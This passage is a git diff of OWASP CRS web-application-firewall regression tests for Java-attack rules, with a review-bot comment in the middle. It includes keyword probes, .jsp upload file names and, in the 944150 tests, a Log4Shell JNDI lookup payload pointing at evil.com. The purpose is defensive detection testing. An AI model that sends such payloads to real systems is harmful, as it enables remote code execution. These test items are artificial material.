test_title: 944130-376 + desc: "Argument name includes keyword java.lang.System" + stages: + - 
stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-377 + desc: "Cookie test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-378 + desc: "Cookie name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-379 + desc: "Request header test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-380 + desc: "XML attribute value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-381 + desc: "XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-382 + desc: "Nested XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-383 + desc: "Content-Type text/plain includes keyword java.lang.System" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-384 + desc: "Content-Type application/json arg value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-385 + desc: "Content-Type application/json arg name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-386 + desc: "Argument test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-387 + desc: "Argument name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-388 + desc: "Cookie test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-389 + desc: "Cookie name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + version: "HTTP/1.0" + data: 
"test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-390 + desc: "Request header test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-391 + desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-392 + desc: "XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-393 + desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-394 + desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-395 + desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-396 + desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-397 + desc: "Argument test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-398 + desc: "Argument name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-399 + desc: "Cookie test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-400 + desc: "Cookie 
name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-401 + desc: "Request header test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-402 + desc: "XML attribute value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-403 + desc: "XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-404 + desc: "Nested XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-405 + desc: "Content-Type text/plain includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-406 + desc: "Content-Type application/json arg value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + 
log_contains: "id \"944130\"" + - test_title: 944130-407 + desc: "Content-Type application/json arg name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-408 + desc: "Argument test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-409 + desc: "Argument name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-410 + desc: "Cookie test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-411 + desc: "Cookie name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-412 + desc: "Request header test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-413 + desc: "XML attribute value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-414 + desc: "XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-415 + desc: "Nested XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-416 + desc: "Content-Type text/plain includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-417 + desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-418 + desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log_contains: "id \"944130\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml new file mode 100644 index 0000000000..94fa1197e6 --- /dev/null +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml 
@@ -0,0 +1,141 @@
+---
+meta:
+ author: lifeforms
+ description: None
+ enabled: true
+ name: 944140.yaml
+tests:
+ - test_title: 944140-1
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /
+ output:
+ no_log_contains: id "944140"
+ - test_title: 944140-2
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-Filename: a.jsp
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload1
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-3
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X_Filename: B.jsp
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload2
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-4
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-File-Name: a.jspx
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload3
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-5
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-Filename: a.jsp..
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload4
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-6
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-Filename: a.jspx..
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-7
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-File-Name: foo.jspx...
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-8
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X_Filename: foo.jspx.
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload7
+ output:
+ log_contains: id "944140"
+ - test_title: 944140-9
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ X-File-Name: foo.html
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /upload8
+ output:
+ no_log_contains: id "944140"
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml
new file mode 100644
index 0000000000..d40081dae8
--- /dev/null
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml
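Review bot: Every stage in this file reuses `desc: Java script uploads`, so a failure in 944140-3 or 944140-8 reads identically to any other and the header/extension variant under test has to be recovered from the YAML; give each stage a distinguishing description, e.g. `desc: "X_Filename header, uppercase .jsp extension"` for 944140-3 and `desc: "X-File-Name header, .html is not flagged (negative)"` for 944140-9. `description: None` under `meta` looks like an unfilled placeholder rather than a deliberate value. All eight positive stages carry the file name in a custom request header; if the rule also inspects multipart upload file names, none of these stages exercises that path and one multipart stage would close the gap. The sibling 944130.yaml in this commit quotes its expectation (`"id \"944130\""`) while this file leaves `id "944140"` bare; both parse, but one style across the commit is easier to grep and lint.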
@@ -0,0 +1,414 @@
+---
+# NOTE: Please keep these tests in sync with 944151.yaml.
+# 944151 should detect the same things as 944150.
+meta:
+ author: "dune73, Max Leske"
+ enabled: true
+ name: "944150.yaml"
+ description: "Description"
+tests:
+ - test_title: 944150-1
+ desc: Log4J exploit on arg foo
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=${jndi:ldap://evil.com/webshell}
+ output:
+ log_contains: id "944150"
+ - test_title: 944150-2
+ desc: Log4J exploit on User-Agent
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
